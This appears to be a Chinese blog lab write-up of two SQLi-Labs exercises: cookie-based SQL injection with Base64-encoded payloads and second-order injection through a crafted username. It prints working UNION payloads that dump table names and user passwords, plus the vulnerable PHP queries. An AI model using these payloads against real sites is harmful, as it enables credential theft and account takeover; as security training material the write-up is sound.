06_SQL注入_二次注入&加密解密

最新推荐文章于 2024-04-28 16:11:59 发布
最新推荐文章于 2024-04-28 16:11:59 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: Web安全实战记录 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42171569/article/details/124852680
版权

06_SQL注入_加密注入&二次注入

1.加密注入

SQL注入的思路是用户用自定义语句和原本的SQL语句拼接,但有时开发者会对获取到的数据进行加密,那么对于渗透测试者而言如果想要在这样的情况下进行操作,则需要将自己的注入语句进行相同的加密处理后与原本的语句进行拼接。这种类型的大体思路和先前的思路整体无异,唯一的区别就是需要测试者先写好payload,再进行加密,随后将数据包放出进行注入尝试。

加密类型的注入在SQLi-Labs中得到了复现,实验如下:

  • 【靶场】SQLi-Labs less-21
  • 【知识点】post注入&cookie注入&加密注入
  • 【工具】burpsuite
  • 【目标】测试人员拥有账户admin,其密码为admin。目标为获取其他用户的密码。
  • 【实验步骤】

登录admin,提交后抓取回显数据包,内容如下:

GET /sqli-labs-master/Less-21/index.php HTTP/1.1

Host: 192.168.124.21

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.124.21/sqli-labs-master/Less-21/

Connection: close

Cookie: uname=YWRtaW4%3D

Upgrade-Insecure-Requests: 1

Cookie: uname=YWRtaW4%3D由于Base64编码的特性是将%3D作为填充,由此判断在Cookie处尝试注入需要对payload进行base64编码(decoder模块可以完成这项操作)

注入点判断
在这里插入图片描述

构造cookie值为admin’(base64:YWRtaW4n)

报错如下:

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘admin’') LIMIT 0,1’ at line 1

判断我们需要闭合单引号和括号

修改cookie为admin’)# (base64:YWRtaW4nKSM=)回显正常!
在这里插入图片描述

联合查询进行注入

admin') order by 4#

出现报错:Issue with your mysql: Unknown column ‘4’ in ‘order clause’

修改payload为admin') order by 3#

回显正常!

修改payload判断回显位置

admin') and 1=-1 union select 1,2,3#

在这里插入图片描述

修改2,3进行查询即可

信息收集

信息收集的payload如下:

admin') and 1=-1 union select 1,version(),3#

admin') and 1=-1 union select 1,user(),3#

admin') and 1=-1 union select 1,database(),3#

得到如下信息

DBMS:Mysql
版本:5.0以上
用户:root
当前数据库:security

信息爆破

爆出所有表名:

admin') and 1=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'#
在这里插入图片描述
爆出user中所有的列名

admin') and 1=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'#

在这里插入图片描述
查询所有用户名和密码

admin') and 1=-1 union select 1,group_concat(username),group_concat(password) from users#

在这里插入图片描述
任务完成!

2.二次注入

二次注入属于白盒测试的范畴,需要根据源代码判断其是否存在,其成因可以概述为:入库的数据在调用时和语句进行拼接从而进行一系列自定义操作。
在这里插入图片描述

如某网站,创建用户的SQL语句为

$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";

更改密码的SQL语句为:

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

那么就存在二次注入的漏洞,具体危害见如下实验:

【靶场】Sqli-labs less24

【知识点】二次注入

【提示】关键代码为上述代码,已知存在一个用户xigua,想办法登录该账户

【过程】

分析两段源代码

$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";

该代码直接将获得的用户名和密码插入到users表中,没做任何处理,任何形式的数据都能插入,包括含有特殊符号的参数

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

对于这段代码中如果username中含有’#,那么就会出现一些问题,如username为 admin’#时sql语句就会变为

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";

这样的语句执行,就会变向越权修改admin的密码,有了上述思路,我们就能够尝试变向越权修改xigua的密码进行登录。

向数据库中注入恶意代码

注册一个用户,其用户名为xigua’#,密码88888888
在这里插入图片描述
变相越权修改密码

登录该用户,并修改密码为999999999,根据分析这个密码将会变相的成为用户xigua的密码
在这里插入图片描述
尝试登录
在这里插入图片描述
成功登录!回家吃西瓜🍉
【捞一捞本系列其他文章,不熟悉注入思路的可以通过本专栏其他文章进行交流】
https://blog.csdn.net/qq_42171569/category_11762282.html

路人harutoo
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF 加密 解密 SQL注入 BASE64
03-19
CTF 加密 解密 SQL注入 BASE64
SQL注入漏洞测试(参数加密)
天天学安全专属博客
10-31 1084
SQL注入漏洞测试(参数加密)
SQL Server加密SQL注入
zhongqi的专栏
04-18 765
 SQL Server上的加密          SQL Server上内置了加密用来保护各种类型的敏感数据。在很多时候,这个加密对于你来说是完全透明的;当数据被存储时候被加密,它们被使用的时候就会自动加密。在其他的情况下,你可以选择数据是否要被加密SQL Server可以加密下列这些组件:      ·密码      ·存储过程,视图,触发器,用户自定义函数,默认值,和规则。      ·
浅谈SQL注入式攻击与防范之一
Fubao Zheng的专栏
01-06 1180
///////////今天看到一篇关于SQL注入的文章,根据自己的思路整理一下,欢迎大神拍砖////////// 我们了解一下SQL注入的原理:没有对页面参数进行非法字符进行校验是一大原因。 特别是对于一些开源系统而言,数据库的结构都是总所周知的,还有就是地址栏后面的链接参数支持SQL子查询语句。 所以黑客就利用这些已经知道的字段和表名称编写攻击语句,然后通过在链接地址后面跟上这些语句来检索
[网络安全]sqlmap加密注入教程+实战详析
等风来
08-02 5846
为什么使用sqlmap加密注入 在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。 在开始本文前,sqlmap基础知识及姿势可参考: [网络安全]以留言板项目渗透实例带你入门sqlmap 加密注入语法 基本语法: python sqlmap.py -u 目标URL --注入点="参数=xx"* --dbms 数据库 --threads=线程数 --batch --tamper=加密方式(base64encode等) * 表示只对该参数
SQL注入-6】二次注入 加解密等等
qq_41889600的博客
11-02 325
二次注入 加解密注入
解密用户和密码后创建SqlSessionFacotry
liansehai的专栏
04-15 148
String resource = " mybatis-config.xml"; InputStream inputStream ; InputStream in= Resources.getResourceAsStream ( "jdbc.properties"); Properties props =new Properties(); props.load (in); String user...
SQL注入实验详细过程及讲解
2302_78587828的博客
08-14 2076
SQL 注入攻击是通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
如何手动注入 SqlSessionFactory 和 SqlSessionTemplate
iexplore的专栏
10-07 730
mybatis-spring-1.3.2中取消了自动注入SqlSessionFactory 和 SqlSessionTemplate,也就是mybatis依赖版本的问题。在rescource目录下配置mybatis/mybatis-config-dhsz.xml,注意如果配置在其他位置,需修改MybatisConfigDhsz类中的路径。在tddl.mybatis.config目录下新增MybatisConfigDhsz类,注意把${APP_NAME}替换为自己的APP_NAME。
python向数据库中添加参数_第四篇:python操作数据库时的传参问题
weixin_39517054的博客
11-26 499
python在操作数据库执行sql的时候我们经常会遇到传参问题,以下是我总结的几种方法:1、格式化字符串city = 'beijing'cur.execute(“SELECT * FROM %s WHERE city = %s”, city)2、使用字典传递sql = “INSERT INTO user VALUES(%(username)s, %(password)s, %(email)s)”v...
Java毕业设计-基于Java的两个通用安全模块的设计与实现(源代码+论文).rar
03-22
该模块专注于网络通信过程中的安全问题,提供了防止SQL注入、XSS攻击等常见网络攻击的有效手段。通过内置的安全过滤器和服务器端验证机制,可以有效拦截恶意请求,保护Web应用免受网络攻击的侵害。同时,模块还支持...
oracle sql monitor简单使用说明
雅冰石的专栏
04-26 320
activity活动这里显示时间大多花在了哪里。
SqlSessionFactory
weixin_42594143的博客
04-26 413
在使用SqlSessionFactory时,需要注意的是,它是一个重量级的对象,一般情况下,应该尽量避免频繁地创建和销毁SqlSessionFactory对象,可以将其作为单例对象在整个应用中共享。SqlSessionFactory是MyBatis框架中的一个重要接口,用于创建SqlSession对象。SqlSessionFactory的主要作用是创建SqlSession对象,它是一个线程安全的对象,一般情况下,一个应用中只需要创建一个SqlSessionFactory对象即可,因为它的创建是比较耗时的。
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
最新发布
keyboard专栏
04-28 368
在 PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
SQL的基础语句
qq_51321722的博客
04-22 1475
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包含左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包含右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
优化SQL的方法
weixin_44139651的博客
04-26 1158
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
szr_sql注入攻击
09-15
szr_sql注入攻击是一种常见的网络安全威胁,它利用未经过滤或不正确过滤的用户输入,将恶意SQL代码注入到应用程序的数据库查询中。这种攻击可能会导致数据库被非法访问、数据泄露、修改或删除数据,甚至完全控制受攻击的应用程序。 下面是一些防止szr_sql注入攻击的方法: 1. 使用参数化查询或预编译语句:这样可以将用户输入作为参数传递给数据库查询,而不是直接将其插入到查询语句中。这样可以防止恶意代码的注入。 2. 对用户输入进行严格的验证和过滤:确保只接受预期的数据类型和格式,并剔除任何可疑的字符或代码。使用安全的输入验证函数和正则表达式来过滤用户输入。 3. 最小化特权:确保数据库用户只拥有最少的权限,限制其对数据库的访问和操作。这样可以减少攻击者的潜在危害。 4. 更新和维护应用程序和数据库:及时应用安全补丁,确保应用程序和数据库的漏洞得到修复。 5. 审计和监控:定期审计数据库访问日志,检测异常活动和潜在的注入攻击。使用入侵检测系统和防火墙来监控和阻止恶意流量。 通过采取这些安全措施,可以有效减少szr_sql注入攻击的风险,并保护应用程序和数据库的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值